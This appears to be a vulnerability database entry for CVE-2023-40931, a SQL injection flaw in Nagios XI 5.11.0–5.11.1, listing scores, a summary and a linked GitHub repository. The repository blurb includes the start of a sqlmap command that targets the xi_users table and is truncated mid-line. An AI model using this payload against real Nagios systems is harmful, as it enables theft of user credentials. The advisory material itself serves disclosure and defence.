NA

CVE-2023-40931

Published: 19/09/2023 Updated: 22/09/2023
CVSS v3 Base Score: 6.5 | Impact Score: 3.6 | Exploitability Score: 2.8
VMScore: 0

Vulnerability Summary

A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated malicious users to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

nagios nagios xi

Github Repositories

The sqlmap payload to exploit CVE-2023-40931

CVE-2023-40931 The sqlmap payload to exploit CVE-2023-40931 Payload Required Information: Valid Username and Password Domain and path of hosted instance sqlmap -D nagiosxi -T xi_users -u "<INSTANCE>/nagiosxi/admin/banner_message-ajaxhelperphp?action=acknowledge_banner_message&id=3&token=`curl -ksX POST <INSTANCE&g